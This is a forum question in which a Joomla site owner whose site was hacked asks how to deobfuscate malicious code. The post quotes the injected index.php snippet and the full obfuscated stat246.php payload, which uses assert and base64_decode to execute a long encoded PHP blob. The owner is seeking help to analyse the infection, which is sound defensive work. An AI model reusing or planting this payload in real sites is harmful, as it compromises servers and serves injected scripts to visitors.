Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
A
A
Arthur2016-08-30 10:19:03
PHP
Arthur, 2016-08-30 10:19:03

What is the best service to use for malware deobfuscation?

My site was hacked and a foreign code was connected. How to find out what he is doing?
Site on Joomla. It was in index.php

/*24676145*/ if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo "
<script language=JavaScript id=scriptData ></script>
<script language=JavaScript src=/modules/mod_stats/stat246.php ></script>
";} /*24676145*/

And this is in stat246.php
$hnqkty="a"."\x73"."s".chr(101)."r"."t";
$vxuamn="b"."a"."s"."\x65"."6"."\x34"."\x5f"."\x64".chr(101)."\x63"."o"."d"."\x65";

@$hnqkty(
@$vxuamn(
'ZXZhbChiYXNlNjRfZGVjb2RlKCdEUW8vUGp3L2NHaHdEUW9qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1OQ2o4K1BEOXdhSEFOQ2cwS0pFZE1UMEpCVEZOYklrUkZRbFZISWwwOUpFUkZRbFZIUFRBN0RRb05DbWxtS0NSRVJVSlZSejQ5TXlrZ2V5QU5DZ2xwYm1sZmMyVjBLQ0prYVhOd2JHRjVYMlZ5Y205eWN5SXNWRkpWUlNrN0RRb0phVzVwWDNObGRDZ2laWEp5YjNKZmNtVndiM0owYVc1bklpd2dSVjlCVEV3Z1hpQkZYMDVQVkVsRFJTazdEUXA5Wld4elpYc05DZ2xBYVc1cFgzTmxkQ2dpWkdsemNHeGhlVjlsY25KdmNuTWlMRVpCVEZORktUc05DZ2xBYVc1cFgyRnNkR1Z5S0NKa2FYTndiR0Y1WDJWeWNtOXljeUlzUmtGTVUwVXBPdzBLZlEwS0RRcEFhVzVwWDNObGRDZ2liRzluWDJWeWNtOXljeUlzSUVaQlRGTkZLVHNOQ2tCcGJtbGZZV3gwWlhJb0lteHZaMTlsY25KdmNuTWlMQ0JHUVV4VFJTazdEUW9OQ2tCelpYUmZkR2x0WlY5c2FXMXBkQ2czS1RzTkNnMEtKSFJwYldWemRHRnlkRDEwYVcxbEtDazdEUW9OQ2lNakl5TWpJeU1qSXcwS0RRcHBaaWdoWm5WdVkzUnBiMjVmWlhocGMzUnpLQ0ptYVd4bFgyZGxkRjlqYjI1MFpXNTBjeUlwS1hzTkNtWjFibU4wYVc5dUlHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUm1hV3hsS1hzTkNna2tZMjl1ZEdWdWREMXBiWEJzYjJSbEtDSWlMR1pwYkdVb0pHWnBiR1VwS1RzTkNpQUphV1lvYzNSeWJHVnVLQ1JqYjI1MFpXNTBLVHd4S1NCN2NtVjBkWEp1SUVaQlRGTkZPMzBOQ2dseVpYUjFjbTRnSkdOdmJuUmxiblE3RFFwOWZRMEtEUXBwWmlnaFpuVnVZM1JwYjI1ZlpYaHBjM1J6S0NKbWFXeGxYM0IxZEY5amIyNTBaVzUwY3lJcEtYc05Da0JrWldacGJtVW9Ja1pKVEVWZlFWQlFSVTVFSWl3Z09DazdEUXBtZFc1amRHbHZiaUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWdrWm1sc1pTd2tZMjl1ZEdWdWREMGlJaXdrY0dGeWJUMGlJaWw3RFFvSmFXWW9KSEJoY20wOVBUaDhmQ1J3WVhKdFBUMGlSa2xNUlY5QlVGQkZUa1FpS1hza1puQTlabTl3Wlc0b0pHWnBiR1VzSW1FaUtUdDlEUW9KWld4elpYc2tabkE5Wm05d1pXNG9KR1pwYkdVc0luY2lLVHQ5RFFvSmFXWW9KR1p3S1hzTkNna0phV1lvWm5keWFYUmxLQ1JtY0N3a1kyOXVkR1Z1ZENrOVBUMUdRVXhUUlNsN2NtVjBkWEp1SUVaQlRGTkZPMzBOQ2drSlptTnNiM05sS0NSbWNDazdEUW9KQ1hKbGRIVnliaUJ6ZEhKc1pXNG9KR052Ym5SbGJuUXBPdzBLQ1gxbGJITmxlM0psZEhWeWJpQkdRVXhUUlR0OURRcDlmUTBLRFFwcFppZ2hablZ1WTNScGIyNWZaWGhwYzNSektDSjFjbXhmWjJWMFgyMXBZM0p2SWlrcGV3MEtablZ1WTNScGIyNGdkWEpzWDJkbGRGOXRhV055Ynlna2RYSnNMQ0FrZEdsdFpXOTFkRDA0TENBa1JFVkNWVWM5TUNsN0RRb05DZ2xwWmlna1JFVkNWVWMrUFRNcElIdHBibWxmYzJWMEtDSmthWE53YkdGNVgyVnljbTl5Y3lJc1ZGSlZSU2s3ZlEwS0NXVnNjMlY3YVc1cFgzTmxkQ2dpWkdsemNHeGhlVjlsY25KdmNuTWlMRVpCVEZORktUdDlEUW9KYVc1cFgzTmxkQ2dpWlhKeWIzSmZjbVZ3YjNKMGFXNW5JaXdnUlY5QlRFd2dYaUJGWDA1UFZFbERSU2s3RFFvSmFXNXBYM05sZENnaWJHOW5YMlZ5Y205eWN5SXNJRVpCVEZORktUc05DZzBLQ1dsbUtDRnpkSEpwYzNSeUtDUjFjbXdzSWpvdkx5SXBLU0FrZFhKc1BTSm9kSFJ3T2k4dklpNGtkWEpzT3cwS0NTTWpJSE5qYUdWdFpTeG9iM04wTEhCdmNuUXNkWE5sY2l4d1lYTnpMSEJoZEdnc2NYVmxjbmtzWm5KaFoyMWxiblFOQ2dra1lUMXdZWEp6WlY5MWNtd29KSFZ5YkNrN0RRb0phV1lvWlcxd2RIa29KR0ZiY0c5eWRGMHBLWHNrWVZ0d2IzSjBYVDA0TUR0OURRb0phV1lvWlcxd2RIa29KR0ZiY0dGMGFGMHBLWHNrWVZ0d1lYUm9YVDBpTHlJN2ZRMEtEUW9KSkdGYmFHOXpkRjA5YzNSeVgzSnZkREV6S0NSaFcyaHZjM1JkS1RzTkNna2tkWEpzUFNSaFczTmphR1Z0WlYwdUp6b3ZMeWN1SkdGYmFHOXpkRjB1S0NCbGJYQjBlU2drWVZ0d2IzSjBYU2tnZkh3Z0pHRmJjRzl5ZEYwOVBUZ3dJRDhpSWpvaU9uc2tZVnR3YjNKMFhYMGlLUzRrWVZ0d1lYUm9YUzRvWlcxd2RIa29KR0ZiY1hWbGNubGRLVDhpSWpvaVAzc2tZVnR4ZFdWeWVWMTlJaWs3RFFvTkNpQWdJQ0FrY21WelBVWkJURk5GT3cwS0RRb2dJQ0FnYVdZb0lHWjFibU4wYVc5dVgyVjRhWE4wY3lnblkzVnliRjlwYm1sMEp5a2dLWHNOQ2dscFppZ29KSE5vUFdOMWNteGZhVzVwZENna2RYSnNLU2twZXcwS0NRbGpkWEpzWDNObGRHOXdkQ2drYzJnc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSUZSU1ZVVXBPdzBLQ1FsamRYSnNYM05sZEc5d2RDZ2tjMmdzSUVOVlVreFBVRlJmVkVsTlJVOVZWQ3dnSkhScGJXVnZkWFFwT3cwS0NRbGpkWEpzWDNObGRHOXdkQ2drYzJnc0lFTlZVa3hQVUZSZlEwOU9Ua1ZEVkZSSlRVVlBWVlFzSUNSMGFXMWxiM1YwS1RzTkNna0pKSEpsY3oxamRYSnNYMlY0WldNb0pITm9LVHNOQ2drSlkzVnliRjlqYkc5elpTZ2tjMmdwT3cwS0NYME5DaUFnSUNCOURRb2dJQ0FnWld4elpXbG1LQ0JwYmw5aGNuSmhlU2hwYm1sZloyVjBLQ0poYkd4dmQxOTFjbXhmWm05d1pXNGlLU3hoY25KaGVTZ3hMRlJTVlVVc0lsUlNWVVVpTENKUGJpSXNJazlPSWlrcElDbDdJQTBLQ1dsdWFWOXpaWFFvSW1SbFptRjFiSFJmYzI5amEyVjBYM1JwYldWdmRYUWlMQ0FrZEdsdFpXOTFkQ2s3RFFvSmFXWW9ablZ1WTNScGIyNWZaWGhwYzNSektDZG1hV3hsSnlrcGV3MEtDUWtrY21WeklEMGdhVzF3Ykc5a1pTZ2lJaXhtYVd4bEtDUjFjbXdwS1RzZ0l5TWdjR2h3UVd4c0RRb0pDUzh2SkhKbGN5QTlJR2x0Y0d4dlpHVW9JaUlzWm1sc1pTZ2tkWEpzTENCbVlXeHpaU3dnYzNSeVpXRnRYMk52Ym5SbGVIUmZZM0psWVhSbEtHRnljbUY1S0Nkb2RIUndKeUE5UGlCaGNuSmhlU2duZEdsdFpXOTFkQ2NnUFQ0Z0pIUnBiV1Z2ZFhRcEtTa3BLVHNnSXlNZ2NHaHdOUTBLQ1gwTkNpQWdJQ0I5RFFvZ0lDQWdaV3h6WldsbUtDQm1kVzVqZEdsdmJsOWxlR2x6ZEhNb0oyWnpiMk5yYjNCbGJpY3BJQ2w3RFFvSkpHOXNaRjkwYVcxbFgyeHBiV2wwUFdsdWFWOW5aWFFvSW0xaGVGOWxlR1ZqZFhScGIyNWZkR2x0WlNJcE95QWpJeUJ5WlcxbGJXSmxjZzBLQ1hObGRGOTBhVzFsWDJ4cGJXbDBLQ1IwYVcxbGIzVjBLVHNnSXlNZ2IyNXNlU0IwYUdseklIUnBiV1Z2ZFhRZ2NtVmhiR3g1SUhkdmNtc2dEUW9KYVdZb0tDUnphRDFtYzI5amEyOXdaVzRvSkdGYmFHOXpkRjBzSUNSaFczQnZjblJkTENBa1pYSnlibThzSUNSbGNuSnpkSElzSUNSMGFXMWxiM1YwS1NrcGV3MEtDUWx6ZEhKbFlXMWZjMlYwWDNScGJXVnZkWFFvSkhOb0xDUjBhVzFsYjNWMEtUc2dJeU1nZEdocGN5QjBhVzFsYjNWMElHNXZkQ0IzYjNKcklBMEtDUWtrYzNSeVBTSkhSVlFpRFFvSkNRa3VJaUI3SkdGYmNHRjBhRjE5SWk0b0lXVnRjSFI1S0NSaFczRjFaWEo1WFNrL0lqOTdKR0ZiY1hWbGNubGRmU0k2SWlJcExpSWdTRlJVVUM4eExqQmNjbHh1SWcwS0NRa0pMaUpJYjNOME9pQWlMaVJoVzJodmMzUmRMaWhsYlhCMGVTZ2tZVnR3YjNKMFhTbDhmQ1JoVzNCdmNuUmRQVDA0TUQ4bkp6b25PaWN1SkdGYmNHOXlkRjBwTGlKY2NseHVJZzBLQ1FrSkxpSmNjbHh1WEhKY2JpSU5DZ2tKT3cwS0NRbG1kM0pwZEdVb0pITm9MQ0FrYzNSeUtUc05DZ2tKSkhKbGN5QTlJQ0lpT3cwS0lDQWdJQ0FKQ1hkb2FXeGxLQ0ZtWlc5bUtDUnphQ2twRFFvSkNRbDdJQ1J5WlhNZ0xqMGdabWRsZEhNb0pITm9MQ0EwTURrMktUc2dmUTBLQ1FsbVkyeHZjMlVvSkhOb0tUc05DZ2tKSkhKbGN6MXpkV0p6ZEhJb0pISmxjeXdnYzNSeWNHOXpLQ1J5WlhNc0lseHlYRzVjY2x4dUlpa3JOQ2s3RFFvSmZRa05DZ2x6WlhSZmRHbHRaVjlzYVcxcGRDZ2tiMnhrWDNScGJXVmZiR2x0YVhRcE95QWpJeUJ5WldOdmRtVnlEUW9nSUNBZ2ZRMEtEUW9nSUNBZ2FXWW9jM1J5YkdWdUtDUnlaWE1wUERFcElDUnlaWE05UmtGTVUwVTdEUW9OQ2lBZ0lDQnlaWFIxY200Z0pISmxjenNOQ24xOURRb05DaU1qSXlNakl5TWpJdzBLRFFva2RYSnNYM1J2UFNKY2VEWTRJaTVqYUhJb01URTJLUzVqYUhJb01URTJLUzRpWEhnM01DSXVJam9pTGlJdklpNGlYSGd5WmlJdUlqUWlMaUpjZURjNUlpNWphSElvTVRJeUtTNWphSElvTVRFeEtTNWphSElvTVRJd0tTNGlZeUl1SWx4NE5qUWlMaUpsSWk0aWVDSXVZMmh5S0RFeU1Ta3VJbVFpTGlKY2VEWTVJaTRpTGlJdVkyaHlLRGszS1M0aVhIZzNNaUl1SWx4NE5qY2lMaUl2SWk1amFISW9NVEExS1M1amFISW9NVEF3S1M0aVhIZ3pOQ0l1WTJoeUtEUTJLUzRpWEhnM01DSXVJbWdpTGlKY2VEY3dJanNOQ2cwS0pIZHlaR2x5UFNJaU93MEtKRVpNUVVjOVJrRk1VMFU3RFFwcFppZ2tSa3hCUnowOVBVWkJURk5GSUNZbUlDZ2tkM0prYVhJOUlpOTBiWEFpS1NBbUppQnBjMTkzY21sMFlXSnNaU2drZDNKa2FYSXBLU0FrUmt4QlJ6MVVVbFZGT3cwS2FXWW9KRVpNUVVjOVBUMUdRVXhUUlNBbUppQW9KSGR5WkdseVBTSXZkbUZ5TDNSdGNDSXBJQ1ltSUdselgzZHlhWFJoWW14bEtDUjNjbVJwY2lrcElDUkdURUZIUFZSU1ZVVTdEUXBwWmlna1JreEJSejA5UFVaQlRGTkZJQ1ltSUdaMWJtTjBhVzl1WDJWNGFYTjBjeWdpYzNselgyZGxkRjkwWlcxd1gyUnBjaUlwSUNZbUlDZ2tkM0prYVhJOWMzbHpYMmRsZEY5MFpXMXdYMlJwY2lncEtTQW1KaUJwYzE5M2NtbDBZV0pzWlNna2QzSmthWElwS1NBa1JreEJSejFVVWxWRk93MEthV1lvSkVaTVFVYzlQVDFHUVV4VFJTQW1KaUFvSkhkeVpHbHlQV2x1YVY5blpYUW9JblZ3Ykc5aFpGOTBiWEJmWkdseUlpa3BJQ1ltSUdselgzZHlhWFJoWW14bEtDUjNjbVJwY2lrcElDUkdURUZIUFZSU1ZVVTdEUXBwWmlna1JreEJSejA5UFVaQlRGTkZJQ1ltSUNna2QzSmthWEk5YVc1cFgyZGxkQ2dpYzJWemMybHZiaTV6WVhabFgzQmhkR2dpS1NrZ0ppWWdhWE5mZDNKcGRHRmliR1VvSkhkeVpHbHlLU2tnSkVaTVFVYzlWRkpWUlRzTkNtbG1LQ1JHVEVGSFBUMDlSa0ZNVTBVZ0ppWWdLR052ZFc1MEtDUjBiWEE5YzNSeVpXRnRYMmRsZEY5dFpYUmhYMlJoZEdFb0pHWndQWFJ0Y0dacGJHVW9LU2twUGpFZ0ppWWdabU5zYjNObEtDUm1jQ2tnSmlZZ0pIZHlaR2x5UFdScGNtNWhiV1VvSkhSdGNGc2lkWEpwSWwwcEtTQW1KaUJwYzE5M2NtbDBZV0pzWlNna2QzSmthWElwS1NBa1JreEJSejFVVWxWRk93MEthV1lvSkVaTVFVYzlQVDFHUVV4VFJTQW1KaUFvS0NSMGJYQTlkR1Z0Y0c1aGJTZ3hMREV4TVNrcElUMDlSa0ZNVTBVZ0ppWWdLQ1IzY21ScGNqMWthWEp1WVcxbEtDUjBiWEFwS1NBbUppQjFibXhwYm1zb0pIUnRjQ2twSUNZbUlHbHpYM2R5YVhSaFlteGxLQ1IzY21ScGNpa3BJQ1JHVEVGSFBWUlNWVVU3RFFwcFppZ2tSa3hCUnowOVBVWkJURk5GSUNZbUlDZ2tkM0prYVhJOVoyVjBZM2RrS0NrcElDWW1JR2x6WDNkeWFYUmhZbXhsS0NSM2NtUnBjaWtwSUNSR1RFRkhQVlJTVlVVN0RRcHBaaWdrUmt4QlJ6MDlQVVpCVEZORktTQjdJQ1IzY21ScGNqMGlJanNnYVdZb0pFUkZRbFZIS1NCN1pHbGxLQ0k4WW5JK1d5MWRJRlJOVUVSSlVpQnViM1FnZDNKcGRHRmliR1VoSWlrN2ZTQmxiSE5sSUh0a2FXVW9LVHQ5SUgwTkNpOHZjSEpwYm5RZ0lqeGljajRpTGlSM2NtUnBjanNOQ2cwS0x5OGtkM0prYVhJOWMzUnlYM0psY0d4aFkyVW9ZWEp5WVhrb0lpOHZJaXhqYUhJb09USXBLU3hoY25KaGVTZ2lMeUlzSWk4aUtTd2tkM0prYVhJcE93MEtEUW9rZDNKd2NtVTlJaUk3RFFvdkwybG1LR1Z0Y0hSNUtDUjNjbkJ5WlNrcElDUjNjbkJ5WlQxcGJtbGZaMlYwS0NKelpYTnphVzl1TG01aGJXVWlLVHNOQ21sbUtHVnRjSFI1S0NSM2NuQnlaU2twSUNSM2NuQnlaVDBpYzJWemN5STdEUW9OQ2lSelpXTnlaWFJyWlhrOVpHbHlibUZ0WlNoZlgwWkpURVZmWHlrdWNHaHdYM1Z1WVcxbEtDazdEUW9rWmw5eVpYTWdJRDBnSkhkeVpHbHlMaUl2SWk0a2QzSndjbVV1SWw4aUxtMWtOU2drYzJWamNtVjBhMlY1TGlKcWN6SjJJaWs3RFFva1psOXNZWE4wSUQwZ0pIZHlaR2x5TGlJdklpNGtkM0p3Y21VdUlsOGlMbTFrTlNna2MyVmpjbVYwYTJWNUxpSnNZWE4wTW5ZaUtUc05DZzBLRFFvakl5TWpJeU1qSXlNTkNnMEtEUW9rY21WelBVWkJURk5GT3cwS0RRcHBaaWdnRFFvSktDQWhabWxzWlY5bGVHbHpkSE1vSkdaZmJHRnpkQ2tnS1EwS0NYeDhEUW9KS0NBek5qQXdJRHdnS0NSMGFXMWxjM1JoY25RZ0xTQW9hVzUwS1dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbVgyeGhjM1FwS1NBcERRb3BJSHNOQ2dra2NtVnpQWFZ5YkY5blpYUmZiV2xqY204b0pIVnliRjkwYnl3Z015azdEUW9KWm1sc1pWOXdkWFJmWTI5dWRHVnVkSE1vSkdaZmNtVnpMQ0FrY21WektUc05DZ2xtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWdrWmw5c1lYTjBMQ0FrZEdsdFpYTjBZWEowS1RzTkNuME5DZzBLYVdZb0lDUnlaWE05UFQxR1FVeFRSU0FwSUhzTkNna2tjbVZ6UFdacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbVgzSmxjeWs3RFFwOURRb05DbkJ5YVc1MElDUnlaWE03RFFvTkNnPT0nKSk7'));
## #################################################################################

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

0 answer(s)
Similar questions
E
Evgeny Samsonov2015-04-05 17:45:37
What is the name of the USB device? 3Reply
S
sergeybogevolny2015-04-06 21:36:50
Is there an example of interaction between bootstrap wizard form and php? 2Reply
A
Arman2016-06-20 12:13:23
How to convert degrees to coordinates? 5Reply
S
student_it2015-04-19 11:49:55
How can I prevent the Referer from being sent when playing an audio file via the HTML Audio tag? 2Reply
L
Lecturer2020-09-26 22:38:29
How to display search results for sections in wordpress? 5Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question